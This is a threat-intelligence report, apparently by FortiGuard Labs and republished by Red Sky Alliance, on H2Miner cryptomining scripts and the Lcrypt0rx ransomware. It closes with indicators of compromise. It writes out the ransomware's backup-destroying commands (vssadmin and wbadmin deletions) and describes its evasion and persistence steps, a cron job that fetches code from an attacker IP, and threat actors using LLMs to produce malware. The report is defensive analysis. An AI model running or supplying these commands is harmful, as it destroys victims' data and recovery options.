X-Industry

The FortiCNAPP team, part of FortiGuard Labs, recently investigated a cluster of virtual private servers (VPS) used for Monero mining. The identified samples are associated with prior H2miner campaigns that we documented in 2020 and have since been updated with new configurations. H2Miner is a Crypto mining botnet that has been active since late 2019.

Researchers also identified a new variant of the Lcryx ransomware, called Lcrypt0rx. Lcryx is a relatively new VBScript-based ransomware strain first observed in November 2024.  This family exhibits several unusual characteristics that suggest it may have been generated using AI.[1]

This is the first documented instance of operational overlap between H2miner and Lcryx, suggesting the following possibilities:

• A collaboration between the operators to maximize financial gain. This makes sense as they both target different operating systems.
• Development of Lcrypt0rx by H2miner operators to increase their campaign’s financial gain.
• Reuse of Lcrypt0rx by H2miner operators to conduct mining operations while shifting the blame.

Adversary Infrastructure & Tool Details - The infrastructure hosts a diverse set of samples, including several commercial tools that target multiple operating systems to maximize financial gain from a victim’s environment.

The infrastructure uses multiple VPS providers for hosting and Command & Control.
 

The Curious Case of Lcryx Ransomware - Analysts suspect the Lcryx family was generated using AI based on the following indicators:

• Function Duplication – Multiple functions are repeated throughout the script with no clear reason, suggesting automated code generation without optimization.
• Incorrect Persistence Mechanisms – Attempts to establish persistence via WinLogon and Image File Execution Options (IFEO) are improperly implemented.
• Flawed Encryption Logic – The encryption routine uses OpenTextFile to locate target files while skipping executables, DLLs, and system files by catching errors and exiting. However, it opens each file at the beginning of the routine while verifying headers without handling errors properly. A global On Error Resume Next statement is used to bypass exceptions, allowing execution to continue unchecked.
• Redundant Object Creation – Multiple unnecessary calls to CreateObject("Wscript.Shell") are made throughout the script, with repeated reinitialization.
• Malformed Syntax – The code includes syntax errors and malformed lines, such as WshShell.RegWriteWshShell.RegWrite and SubSet, reflecting automated generation or a lack of validation.
• Illogical Behaviors – The script attempts to open encrypted files in Notepad, which has no practical function and makes no operational sense.
• Nonexistent Target Paths – Some folders targeted for encryption are not present across common Windows versions, indicating a lack of contextual awareness in environment targeting.
• Invalid Ransom Note URL – The .onion address in the ransom note (http://lcryptordecrypt7xfzq5tclm9jzpwq72uofgy2znkdsxm54zbcu2yid[.]onion) does not conform to valid TOR address specifications. It may have been a placeholder during a transition from v2 to v3 onion services.
• Ineffective AV Disabling – The methods used to disable Bitdefender and Kaspersky antivirus products are incorrect.
• AI Detection Results –To validate initial suspicions prompted by repeated code errors, we ran the script through two tools: AI Code Detector (IH EH), which specializes in identifying code written by ChatGPT, and ZeroGPT, a general-purpose AI content detector. Both flagged the code as likely AI-generated, with confidence scores in the 85–90% range. These findings align with the observable issues throughout the script.

Also observed was the growing adoption of large language models (LLMs) by threat actors in recent years.  Combined with the widespread availability of commercial tools, this trend has significantly lowered the barrier to entry for cybercriminal activity.

Below, Fortinet will examine some interesting aspects of the identified samples.

H2Miner Sample Analysis - H2Miner continues to rely heavily on scripts to disable defenses and expand access, ultimately enabling the deployment of miners.  Many of these scripts resemble previously documented variants; however, this version has been updated with new deployment URLs.

Script Name: ce.sh

MD5 Hash: 1bf1efeadedf52c0ed50941b10a2f468

This script includes code blocks that are structurally similar to earlier H2Miner samples used to terminate security software.  However, this variant goes further by also targeting database and user application processes. Additionally, it deploys Kinsing malware, establishes persistence by registering itself as a service, and attempts to eliminate competing miners by terminating related processes and clearing associated cron entries.
Figure 1: Process Stop
Figure 2: Clearing cron

The script then checks for an existing cron entry that downloads and executes itself from 80[.]64[.]16[.]241, and adds the entry if it’s missing. Finally, it clears both the current and persistent shell command history to cover its tracks.

Figure 3: Cron entry and clearing command history

Script Name: spr.sh

MD5 Hash: a7bee104bb486ad0f10331233cc9a9f1

This script closely resembles earlier H2Miner scripts used to terminate processes and deploy Kinsing malware, but it includes updated URLs.  Notably, the script targets the Alibaba Cloud Security Center agent as well as processes and container images running within Docker, indicating an awareness of cloud-specific defenses and containerized environments.

Figure 4: Killing Aegis

Figure 5: Killing miners and removing miner images

Script Name: cpr.sh

MD5 Hash: 0dc2c71ce9c6c34668e9636abf61b1ae

This script functions as a Kinsing updater.  It removes any existing Kinsing installation and redeploys it by downloading and executing a shell script similar in structure to ce.sh.

Several additional scripts identified during this investigation reuse code blocks from ce.sh, spr.sh, and cpr.sh.  While their specific logic may vary, their ultimate purpose remains consistent: deploying Kinsing, a remote access trojan (RAT) commonly used to deliver crypto miners in compromised environments.
 

Script Name: 1.ps1

MD5 Hash: 01e5b2530d4cba34f91c8090d19c92db

This PowerShell script downloads an XMRig Monero miner from 78[.]153[.]140[.]66 and saves it to the system’s temporary directory as sysupdate.  It then creates a scheduled task using schtasks with the name "Update service for Windows Service" to ensure persistence.  The script’s structure closely resembles those used in early 2021 mining campaigns and appears to have been reused for current operations.  Notably, this XMRig miner is also deployed by the Lcrypt0rx ransomware variant.

The associated configuration file (ff1706b37fea16d75b739a5396d9ffba) points to the Monero wallet:
4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC

This wallet has been previously linked to H2Miner campaigns dating back to late 2021, indicating continuity or overlap in its operator.
Figure 6: Excerpt from config

This usage of older scripts and samples with updated configurations and hosting URLs points to a resurgence of older campaigns from 2020 and 2021.

Lcrypt0rx Sample Analysis

Script Name: Lcrypt0rx.vbs

MD5 Hash: 06a482a6096e8ff4499ae69a9c150e92

Variants: f5f2b61b39105a2b1e6e1a5f4a3863ae, 9f764ec91535eaf03983b930d9f3bacd

Behavior Summary - Analysis of this sample shows that it follows the following step-by-step process:

Privilege Escalation:

Lcrypt0rx first checks if it is running with administrator privileges.  If not, it relaunches itself with elevated rights using Shell.Application to invoke wscript.exe with the /elevated flag.

Figure 7: Relaunch with elevated privileges

System Modifications:

Once elevated, the script disables a range of system utilities and user protections by modifying the Windows Registry.  These include:

Task Manager (taskmgr.exe)

Registry Editor (regedit.exe)

Control Panel

Run dialog

UAC prompts

Admin elevation prompts

User input inactivity lockouts

It also disables the execution of several critical tools:

System Configuration Utility (msconfig.exe)

Autoruns

Group Policy Editor (gpedit.msc)

Process Explorer

System Settings Utility

Figure 8: Registry modifications

Persistence Attempt:

Lcrypt0rx then attempts to establish persistence by adding its full path to the Winlogon Shell registry key and registering itself as an Image File Execution Options (IFEO) debugger for cmd.exe.  However, these attempts fail because the script path is added without prepending wscript.exe, rendering the entries non-functional.

Figure 9: Incorrect persistence

System Interference:

Using WMI, the script then forcibly terminates taskmgr.exe, msconfig.exe, and regedit.exe. It also modifies the Scancode Map registry to disable a wide range of keys, including:

• Modifier keys (Ctrl, Shift, Alt, Windows)
• Function keys (F1, F2, F3, F10)
• System keys (Delete)
• Common letters (C, M, D, T, A, S, K, N, G, E, R, I)
• Mouse buttons are reversed, and all changes are applied immediately to disrupt user control.
   

Figure 10: System control hampering

Attribute Manipulation & Destruction - Next, the script marks itself as read-only, hidden, and system-protected, and proceeds to overwrite the Master Boot Record (MBR)—a destructive move that renders the system unbootable.

Figure 11: Attribute manipulation and MBR overwrite

Defense Evasion - Lcrypt0rx then attempts to disable Windows Defender real-time protection, BitDefender, and Kaspersky.  However, the methods used for BitDefender and Kaspersky are ineffective—likely artifacts of LLM hallucinations. The firewall is disabled via netsh.

Figure 12: Impair Defenses / Encryption Key Generation and File Selection

An 8,192-character master key is then generated using ASCII values 1–255, and a per-file salt of equal length is appended to it during the encryption process.  This key-salt pair is used to XOR-encode each file’s content.

Folders selected for encryption include standard directories and OneDrive backups. System recovery is disrupted by:

cmd.exe /c vssadmin delete shadows /all /quiet
cmd.exe /c wbadmin delete catalog -quiet

Figure 13: Target enumeration

Ransom Note Deployment - Next, a ransom note is dropped in multiple locations (Desktop, Documents, Pictures, Videos, Downloads, Music) and opened in Notepad. The message demands $1,000 (up from $500 in earlier samples) and shortens the payment deadline from 5 to 3 days.  The .onion URL in the note is syntactically incorrect and doesn't match the one shown in the desktop wallpaper, which uses an obsolete V2 TOR address, suggesting a placeholder or reuse by H2Miner actors.

Figure 14: Ransom note

Visual Defacement - An image from https://s10[.]krakenfiles[.]com/uploads/30-04-2025/605q6HLKTv/image[.]jpg is then downloaded and set as the desktop background by editing the HKCU\Control Panel\Desktop\Wallpaper registry key.  

The TOR address in the image aligns with older Lcryx variants.

Figure 15: Downloading and setting the wallpaper

Figure 16: Wallpaper defacement

Backup Persistence - Lcrypt0rx then establishes fallback persistence by dropping and registering multiple embedded scripts via run keys.  This time, persistence works correctly, with the scripts executed using wscript.exe and marked as read-only, system-protected, and hidden.

A summary of the scripts is listed below:

Network Blocking & Shell Restriction - The script then modifies the hosts file to block AV-related domains and disables cmd.exe for the current user by setting:

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD
Figure 17: hostsFile modification

Lcrypt0rx then downloads and executes miners and infostealers before finally entering the encryption routine. This section is not seen in older Lcryx samples.

The details about the executables are listed below.

Monero Wallets - The config used for Monero mining points to the following wallets for mining payouts:

89UoMhtsrpaJTvmJBbvy1cTdg38pomPFnW5Z4sniL2izcLQyGBkEGd96TcBJtzQUi6KAL5Ehe4cFpEMNdGF7tFKpJ1DqE8X

89Arz88KTafhoTPAseYf2bfcWSjNq1YLaVY7ZkFaU21FivDueX4d7X7UErnyjAWHsVB1mibdTGHzqUTsS5FCMog89GVcQCh

4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC.
This is the same wallet observed in previous H2Miner campaigns.

Figure 18: Encryption logic and XOR implementation

File Encryption and Data Disruption - Lcrypt0rx now enters a persistent loop that continuously scans the previously enumerated directories and any attached storage volumes for new files to encrypt.  Each file is processed through an encryption routine with multiple checks and conditions.

The routine begins by attempting to open the file using the OpenTextFile method in VBScript. This fails for executables, DLLs, and other system-critical formats, which are excluded by default through error handling. Before proceeding, the script verifies whether the file:

• Already contains a custom Lcrypt0rx header, indicating it has been encrypted previously
• Matches the name of one of the embedded scripts dropped earlier in the infection chain

Files that fail these checks are queued for encryption.

Figure 19: Encryption header and file skips.

To encrypt each file, Lcrypt0rx generates a unique 8,192-character salt composed of ASCII characters (codes 1–255), which it appends to a pre-generated master key.  This is a notable change from earlier Lcryx variants, where the salt length was only 32 characters.

The script then XORs each character of the file content with the corresponding character from the combined key-salt pair, producing the obfuscated output.  The resulting data is saved to a new file with the .lcryx extension, and the original file is deleted to complete the encryption process.

Figure 20: XOR encoding

As a final step, Lcrypt0rx checks all targeted folders for files associated with backups. Any files with recognized backup-related extensions are deleted to further prevent recovery.

Figure 21: Backup deletion

Despite these actions, the ransomware does not transmit or store the encryption keys locally or remotely. Combined with the use of simple XOR encryption, this makes recovery trivial through basic cryptanalysis. The lack of key management, combined with the presence of scare tactics and superficial ransom demands, suggests that Lcrypt0rx operates more as scareware than a serious ransomware threat.

Conclusion - The H2Miner threat actors have remained active and adaptable since first emerging in late 2019.  Their recent campaigns continue to rely on a blend of reused, proven tooling and newly integrated elements, including the curious addition of Lcrypt0rx ransomware.

While Lcrypt0rx lacks the sophistication of more advanced ransomware families, it introduces distinct techniques for degrading system usability, UI interference, and redundant embedded scripts.  It also bundles commercially available hack tools and infostealers, expanding its functionality beyond simple encryption.

Ultimately, both the H2Miner and Lcrypt0rx chains converge on the deployment of Monero miners, a hallmark of resource hijacking campaigns.  In cloud environments, this results in significant financial impact, as compromised systems incur elevated compute costs, degraded performance, and increased operational risk.

The campaign reflects a broader trend: the commodification of cybercrime, where access to prebuilt tools, LLM-generated code, and cheap infrastructure lowers the barrier to entry, enabling even low-skill actors to launch high-impact campaigns.

IOCs

IPS

78[.]153[.]140[.]66
80[.]64[.]16[.]241
89[.]208[.]104[.]175
47[.]97[.]113[.]36
176[.]65[.]137[.]203
185[.]156[.]72[.]96
80[.]64[.]18[.]161
207[.]231[.]109[.]252
104[.]21[.]32[.]1

Files

ff1706b37fea16d75b739a5396d9ffba
9e4f149dae1891f1d22a2cea4f68432e
a729410de4dc397d1fb2ab8f7ae560d3
2726145d4ef3b34d3c3a566177805c39
1aee8a425ea53c571a16b8efde05ba01
B6cd214bb814362694cc48299ebaf0e5
0680df49e1866c86697028ea73d28d28
d3884cc519c6855ae20d64264d5f6e93
57f0fdec4d919db0bd4576dc84aec752
44143827116c96f5dcace4f95dff8697

Scripts

1bf1efeadedf52c0ed50941b10a2f468
a7bee104bb486ad0f10331233cc9a9f1
0dc2c71ce9c6c34668e9636abf61b1ae
01e5b2530d4cba34f91c8090d19c92db

Kinsing

dbc9125192bd1994cbb764f577ba5dda
b3039abf2ad5202f4a9363b418002351
da753ebcfe793614129fc11890acedbc
ccef46c7edf9131ccffc47bd69eb743b

Lcryptx0r

06a482a6096e8ff4499ae69a9c150e92
f5f2b61b39105a2b1e6e1a5f4a3863ae
9f764ec91535eaf03983b930d9f3bacd

Wallet

4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC
89UoMhtsrpaJTvmJBbvy1cTdg38pomPFnW5Z4sniL2izcLQyGBkEGd96TcBJtzQUi6KAL5Ehe4cFpEMNdGF7tFKpJ1DqE8X
89Arz88KTafhoTPAseYf2bfcWSjNq1YLaVY7ZkFaU21FivDueX4d7X7UErnyjAWHsVB1mibdTGHzqUTsS5FCMog89GVcQCh

This article is shared with permission at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com    

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941 

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122